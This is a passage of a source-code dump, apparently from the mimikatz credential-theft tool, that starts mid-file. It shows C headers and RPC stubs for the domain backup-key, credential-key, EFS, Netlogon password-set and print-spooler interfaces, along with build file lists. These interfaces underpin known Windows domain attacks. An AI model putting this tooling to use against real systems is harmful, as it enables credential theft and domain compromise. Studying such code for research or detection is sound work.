13 | NTSTATUS CLI_MimiCommand(MIMI_HANDLE phMimi, DWORD szEncCommand, BYTE *encCommand, DWORD *szEncResult, BYTE **encResult);
14 | NTSTATUS CLI_MimiClear(handle_t rpc_handle, wchar_t *command, DWORD *size, wchar_t **result);
15 |
16 | void __RPC_USER SRV_MIMI_HANDLE_rundown(MIMI_HANDLE phMimi);
17 | extern RPC_IF_HANDLE MimiCom_v1_0_c_ifspec, MimiCom_v1_0_s_ifspec;
--------------------------------------------------------------------------------
/modules/rpc/kull_m_rpc_ms-bkrp.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "kull_m_rpc.h"
3 |
4 | const GUID BACKUPKEY_BACKUP_GUID, BACKUPKEY_RESTORE_GUID_WIN2K, BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID, BACKUPKEY_RESTORE_GUID;
5 |
6 | NET_API_STATUS BackuprKey(handle_t h, GUID *pguidActionAgent, byte *pDataIn, DWORD cbDataIn, byte **ppDataOut, DWORD *pcbDataOut, DWORD dwParam);
--------------------------------------------------------------------------------
/modules/rpc/kull_m_rpc_ms-credentialkeys.c:
--------------------------------------------------------------------------------
1 | #include "kull_m_rpc_ms-credentialkeys.h"
2 |
3 | #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
4 | #define _ms_credentialkeys_MIDL_TYPE_FORMAT_STRING_SIZE 73
5 | #elif defined(_M_IX86)
6 | #define _ms_credentialkeys_MIDL_TYPE_FORMAT_STRING_SIZE 69
7 | #endif
8 |
9 | typedef struct _ms_credentialkeys_MIDL_TYPE_FORMAT_STRING {
10 | SHORT Pad;
11 | UCHAR Format[_ms_credentialkeys_MIDL_TYPE_FORMAT_STRING_SIZE];
12 | } ms_credentialkeys_MIDL_TYPE_FORMAT_STRING;
13 |
14 | extern const ms_credentialkeys_MIDL_TYPE_FORMAT_STRING ms_credentialkeys__MIDL_TypeFormatString;
15 | static const RPC_CLIENT_INTERFACE mscredentialkeys___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xd9ae4745, 0x178e, 0x4561, {0xa5, 0x3f, 0xf0, 0x84, 0xf9, 0x92, 0x13, 0xe5}}, {1, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000000};
16 | static const MIDL_TYPE_PICKLING_INFO __MIDL_TypePicklingInfo = {0x33205054, 0x3, 0, 0, 0,};
17 | static RPC_BINDING_HANDLE mscredentialkeys__MIDL_AutoBindHandle;
18 | static const MIDL_STUB_DESC mscredentialkeys_StubDesc = {(void *) &mscredentialkeys___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &mscredentialkeys__MIDL_AutoBindHandle, 0, 0, 0, 0, ms_credentialkeys__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
19 |
20 | void CredentialKeys_Decode(handle_t _MidlEsHandle, PKIWI_CREDENTIAL_KEYS * _pType)
21 | {
22 | NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &mscredentialkeys_StubDesc, (PFORMAT_STRING) &ms_credentialkeys__MIDL_TypeFormatString.Format[2], _pType);
23 | }
24 |
25 | void CredentialKeys_Free(handle_t _MidlEsHandle, PKIWI_CREDENTIAL_KEYS * _pType)
26 | {
27 | NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &mscredentialkeys_StubDesc, (PFORMAT_STRING) &ms_credentialkeys__MIDL_TypeFormatString.Format[2], _pType);
28 | }
29 | #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
30 | static const ms_credentialkeys_MIDL_TYPE_FORMAT_STRING ms_credentialkeys__MIDL_TypeFormatString = {0, {
31 | 0x00, 0x00, 0x12, 0x00, 0x38, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x17, 0x00, 0x0a, 0x00, 0x01, 0x00, 0x01, 0x5b, 0x1a, 0x03, 0x18, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x0d, 0x0d, 0x06, 0x06, 0x40, 0x36,
32 | 0x5c, 0x5b, 0x12, 0x00, 0xe2, 0xff, 0x21, 0x03, 0x00, 0x00, 0x09, 0x00, 0xf8, 0xff, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xda, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x08, 0x00,
33 | 0xe6, 0xff, 0x00, 0x00, 0x08, 0x40, 0x5c, 0x5b, 0x00,
34 | }};
35 | #elif defined(_M_IX86)
36 | static const ms_credentialkeys_MIDL_TYPE_FORMAT_STRING ms_credentialkeys__MIDL_TypeFormatString = {0, {
37 | 0x00, 0x00, 0x12, 0x00, 0x36, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x17, 0x00, 0x0a, 0x00, 0x01, 0x00, 0x01, 0x5b, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x08, 0x00, 0x0d, 0x0d, 0x06, 0x06, 0x36, 0x5b,
38 | 0x12, 0x00, 0xe4, 0xff, 0x21, 0x03, 0x00, 0x00, 0x09, 0x00, 0xfc, 0xff, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xdc, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x04, 0x00, 0xe6, 0xff,
39 | 0x00, 0x00, 0x08, 0x5b, 0x00,
40 | }};
41 | #endif
--------------------------------------------------------------------------------
/modules/rpc/kull_m_rpc_ms-credentialkeys.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "kull_m_rpc.h"
3 |
4 | typedef enum _KIWI_CREDENTIAL_KEY_TYPE {
5 | CREDENTIALS_KEY_TYPE_NTLM = 1,
6 | CREDENTIALS_KEY_TYPE_SHA1 = 2,
7 | CREDENTIALS_KEY_TYPE_ROOTKEY = 3,
8 | CREDENTIALS_KEY_TYPE_DPAPI_PROTECTION = 4,
9 | } KIWI_CREDENTIAL_KEY_TYPE;
10 |
11 | typedef struct _KIWI_CREDENTIAL_KEY {
12 | DWORD unkEnum; // version ?
13 | KIWI_CREDENTIAL_KEY_TYPE type;
14 | WORD iterations;
15 | WORD cbData;
16 | BYTE *pbData;
17 | } KIWI_CREDENTIAL_KEY, *PKIWI_CREDENTIAL_KEY;
18 |
19 | typedef struct _KIWI_CREDENTIAL_KEYS {
20 | DWORD count;
21 | KIWI_CREDENTIAL_KEY keys[ANYSIZE_ARRAY];
22 | } KIWI_CREDENTIAL_KEYS, *PKIWI_CREDENTIAL_KEYS;
23 |
24 | void CredentialKeys_Decode(handle_t _MidlEsHandle, PKIWI_CREDENTIAL_KEYS * _pType);
25 | void CredentialKeys_Free(handle_t _MidlEsHandle, PKIWI_CREDENTIAL_KEYS * _pType);
26 |
27 | #define kull_m_rpc_DecodeCredentialKeys(/*PVOID */data, /*DWORD */size, /*PKIWI_CREDENTIAL_KEYS **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) CredentialKeys_Decode)
28 | #define kull_m_rpc_FreeCredentialKeys(/*PKIWI_CREDENTIAL_KEYS **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) CredentialKeys_Free)
29 |
30 | #define LSA_CREDENTIAL_KEY_PACKAGE_NAME L"LSACREDKEY"
31 | //#define LSA_CREDENTIAL_KEY_PACKAGE_ID 0x10000 // pseudo package id. must not collide with any other package id
32 | //#define LSA_CREDENTIAL_KEY_NAME "CredentialKeys"
33 | //#define LSA_CREDENTIAL_KEY_ROOT_KEY_ITERATIONS (1024 * 10) // in parity with cache logon verifier
34 | //
35 | //typedef enum _LSA_CREDENTIAL_KEY_SOURCE_TYPE {
36 | // eFromPrecomputed = 1, // used by Kerberos
37 | // eFromClearPassword,
38 | // eFromNtOwf,
39 | //} LSA_CREDENTIAL_KEY_SOURCE_TYPE, *PLSA_CREDENTIAL_KEY_SOURCE_TYPE;
40 | //
41 | //typedef enum _LSA_CREDENTIAL_KEY_TYPE {
42 | // eDPAPINtOwf = 1, // legacy NTOWF used by DPAPI
43 | // eDPAPISha1, // legacy SHA1 used by DPAPI
44 | // eRootKey, // PBKDF2(NTOWF), uplevel root key
45 | // eDPAPIProtection, // uplevel DPAPI protection key, derived from root key
46 | //} LSA_CREDENTIAL_KEY_TYPE, *PLSA_CREDENTIAL_KEY_TYPE;
47 | //
48 | //typedef struct _LSA_CREDENTIAL_KEY {
49 | // LSA_CREDENTIAL_KEY_SOURCE_TYPE SourceType;
50 | // LSA_CREDENTIAL_KEY_TYPE KeyType;
51 | // USHORT Iterations;
52 | // USHORT KeySize;
53 | //#ifdef MIDL_PASS
54 | // [size_is(KeySize)]
55 | //#endif // MIDL_PASS
56 | // PUCHAR KeyBuffer;
57 | //} LSA_CREDENTIAL_KEY, *PLSA_CREDENTIAL_KEY;
58 | //
59 | //typedef struct _LSA_CREDENTIAL_KEY_ARRAY {
60 | // USHORT KeyCount;
61 | //#ifdef MIDL_PASS
62 | // [size_is(KeyCount)] LSA_CREDENTIAL_KEY Keys[*];
63 | //#else // MIDL_PASS
64 | // LSA_CREDENTIAL_KEY Keys[ANYSIZE_ARRAY];
65 | //#endif // MIDL_PASS
66 | //} LSA_CREDENTIAL_KEY_ARRAY, *PLSA_CREDENTIAL_KEY_ARRAY;
67 | //
68 | ////
69 | //// convenience helper
70 | ////
71 | //typedef struct _LSA_CREDENTIAL_KEY_ARRAY_STORAGE {
72 | // USHORT KeyCount;
73 | // LSA_CREDENTIAL_KEY Keys[8];
74 | //} LSA_CREDENTIAL_KEY_ARRAY_STORAGE, *PLSA_CREDENTIAL_KEY_ARRAY_STORAGE;
--------------------------------------------------------------------------------
/modules/rpc/kull_m_rpc_ms-dcom_IObjectExporter.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "kull_m_rpc.h"
3 |
4 | typedef struct tagCOMVERSION {
5 | USHORT MajorVersion;
6 | USHORT MinorVersion;
7 | } COMVERSION;
8 |
9 | typedef struct tagDUALSTRINGARRAY {
10 | USHORT wNumEntries;
11 | USHORT wSecurityOffset;
12 | USHORT aStringArray[ANYSIZE_ARRAY];
13 | } DUALSTRINGARRAY;
14 |
15 | error_status_t ServerAlive2(handle_t hRpc, COMVERSION *pComVersion, DUALSTRINGARRAY **ppdsaOrBindings, DWORD *pReserved);
--------------------------------------------------------------------------------
/modules/rpc/kull_m_rpc_ms-efsr.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kull_m_rpc.h"
8 |
9 | extern const UUID EFSR_ObjectUUID;
10 |
11 | typedef void *PEXIMPORT_CONTEXT_HANDLE;
12 |
13 | typedef struct pipe_EFS_EXIM_PIPE {
14 | void (__RPC_USER* pull) (CHAR* state, UCHAR* buf, ULONG esize, ULONG* ecount);
15 | void (__RPC_USER* push) (CHAR* state, UCHAR* buf, ULONG ecount);
16 | void (__RPC_USER* alloc) (CHAR* state, ULONG bsize, UCHAR** buf, ULONG* bcount);
17 | char* state;
18 | } EFS_EXIM_PIPE;
19 |
20 | long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags);
21 | long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe);
22 | long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe);
23 | void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE* hContext);
24 | long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName);
25 | long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag);
26 |
27 | RPC_IF_HANDLE efsrpc_v1_0_c_ifspec;
--------------------------------------------------------------------------------
/modules/rpc/kull_m_rpc_ms-nrpc.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "kull_m_rpc.h"
3 | #include "../kull_m_samlib.h"
4 |
5 | typedef wchar_t * LOGONSRV_HANDLE;
6 | typedef struct _NETLOGON_CREDENTIAL {
7 | CHAR data[8];
8 | } NETLOGON_CREDENTIAL, *PNETLOGON_CREDENTIAL;
9 |
10 | typedef enum _NETLOGON_SECURE_CHANNEL_TYPE {
11 | NullSecureChannel = 0,
12 | MsvApSecureChannel = 1,
13 | WorkstationSecureChannel = 2,
14 | TrustedDnsDomainSecureChannel = 3,
15 | TrustedDomainSecureChannel = 4,
16 | UasServerSecureChannel = 5,
17 | ServerSecureChannel = 6,
18 | CdcServerSecureChannel = 7
19 | } NETLOGON_SECURE_CHANNEL_TYPE;
20 |
21 | typedef struct _NETLOGON_AUTHENTICATOR {
22 | NETLOGON_CREDENTIAL Credential;
23 | DWORD Timestamp;
24 | } NETLOGON_AUTHENTICATOR, *PNETLOGON_AUTHENTICATOR;
25 |
26 | typedef struct _NL_TRUST_PASSWORD {
27 | WCHAR Buffer[256];
28 | ULONG Length;
29 | } NL_TRUST_PASSWORD, *PNL_TRUST_PASSWORD;
30 |
31 | NTSTATUS NetrServerReqChallenge(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientChallenge, OUT PNETLOGON_CREDENTIAL ServerChallenge);
32 | NTSTATUS NetrServerAuthenticate2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientCredential, OUT PNETLOGON_CREDENTIAL ServerCredential, IN OUT ULONG *NegotiateFlags);
33 | NTSTATUS NetrServerPasswordSet2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, IN PNL_TRUST_PASSWORD ClearNewPassword);
34 | NTSTATUS NetrServerTrustPasswordsGet(IN LOGONSRV_HANDLE TrustedDcName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedNewOwfPassword, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedOldOwfPassword);
35 |
36 | extern handle_t hLogon;
37 | extern RPC_IF_HANDLE logon_v1_0_c_ifspec;
38 |
39 | handle_t __RPC_USER LOGONSRV_HANDLE_bind(IN LOGONSRV_HANDLE Name);
40 | void __RPC_USER LOGONSRV_HANDLE_unbind(IN LOGONSRV_HANDLE Name, handle_t hLogon);
--------------------------------------------------------------------------------
/modules/rpc/kull_m_rpc_ms-par.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "kull_m_rpc.h"
3 | #include "kull_m_rpc_ms-rprn.h"
4 |
5 | const UUID PAR_ObjectUUID;
6 |
7 | typedef struct _SPLCLIENT_INFO_1 {
8 | DWORD dwSize;
9 | DWORD dwBuildNum;
10 | DWORD dwMajorVersion;
11 | DWORD dwMinorVersion;
12 | unsigned short wProcessorArchitecture;
13 | } SPLCLIENT_INFO_1;
14 |
15 | typedef struct _SPLCLIENT_INFO_2 {
16 | LONG_PTR notUsed;
17 | } SPLCLIENT_INFO_2;
18 |
19 | typedef struct _SPLCLIENT_INFO_3 {
20 | unsigned int cbSize;
21 | DWORD dwFlags;
22 | DWORD dwSize;
23 | wchar_t *pMachineName;
24 | wchar_t *pUserName;
25 | DWORD dwBuildNum;
26 | DWORD dwMajorVersion;
27 | DWORD dwMinorVersion;
28 | unsigned short wProcessorArchitecture;
29 | unsigned __int64 hSplPrinter;
30 | } SPLCLIENT_INFO_3;
31 |
32 | typedef struct _SPLCLIENT_CONTAINER {
33 | DWORD Level;
34 | union {
35 | SPLCLIENT_INFO_1 *pClientInfo1;
36 | SPLCLIENT_INFO_2 *pNotUsed;
37 | SPLCLIENT_INFO_3 *pClientInfo3;
38 | } ClientInfo;
39 | } SPLCLIENT_CONTAINER;
40 |
41 | DWORD RpcAsyncOpenPrinter(handle_t hRemoteBinding, wchar_t *pPrinterName, PRINTER_HANDLE *pHandle, wchar_t *pDatatype, DEVMODE_CONTAINER *pDevModeContainer, DWORD AccessRequired, SPLCLIENT_CONTAINER *pClientInfo);
42 | DWORD RpcAsyncClosePrinter(PRINTER_HANDLE *phPrinter);
43 | DWORD RpcAsyncAddPrinterDriver(handle_t hRemoteBinding, wchar_t *pName, DRIVER_CONTAINER *pDriverContainer, DWORD dwFileCopyFlags);
44 | DWORD RpcAsyncEnumPrinterDrivers(handle_t hRemoteBinding, wchar_t *pName, wchar_t *pEnvironment, DWORD Level, unsigned char *pDrivers, DWORD cbBuf, DWORD *pcbNeeded, DWORD *pcReturned);
45 | DWORD RpcAsyncGetPrinterDriverDirectory(handle_t hRemoteBinding, wchar_t *pName, wchar_t *pEnvironment, DWORD Level, unsigned char *pDriverDirectory, DWORD cbBuf, DWORD *pcbNeeded);
46 | DWORD RpcAsyncDeletePrinterDriverEx(handle_t hRemoteBinding, wchar_t *pName, wchar_t *pEnvironment, wchar_t *pDriverName, DWORD dwDeleteFlag, DWORD dwVersionNum);
--------------------------------------------------------------------------------
/notrunk.lst:
--------------------------------------------------------------------------------
1 | *.obj
2 | *.lib
3 | *.exp
4 | *.kirbi
5 | *.log
6 | *.hiv
7 | *.key
8 | *.reg
9 | *.pfx
10 | *.cer
11 | *.pvk
12 | *.ndr
13 | *.der
14 | *.dmp
--------------------------------------------------------------------------------
/trunk.lst:
--------------------------------------------------------------------------------
1 | .\Win32
2 | .\x64
3 | README.md
4 | kiwi_passwords.yar
5 | mimicom.idl
--------------------------------------------------------------------------------